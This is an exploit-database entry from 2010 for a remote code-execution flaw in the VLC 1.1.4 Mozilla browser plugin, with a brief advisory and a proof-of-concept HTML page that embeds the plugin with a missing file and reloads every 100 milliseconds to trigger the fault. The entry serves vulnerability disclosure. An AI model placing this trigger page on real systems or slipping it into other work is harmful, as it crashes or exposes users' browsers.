VideoLAN VLC Media Player 1.1.4 Mozilla MultiMedia Plugin - Remote Code Execution

EDB-ID:

34870

CVE:

N/A


Author:

shinnai

Type:

remote


Platform:

Windows

Date:

2010-10-19


source: https://www.securityfocus.com/bid/44211/info

VLC media player is prone to a remote code-execution vulnerability.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

VLC media player 1.1.4 is vulnerable; other versions may also be affected. 

 <html>  
   <body onload="setTimeout('location.reload()', 100);">
     <embed type="application/x-vlc-plugin" src="NonExistantFileName.avi"></embed>
   </body>
 </html>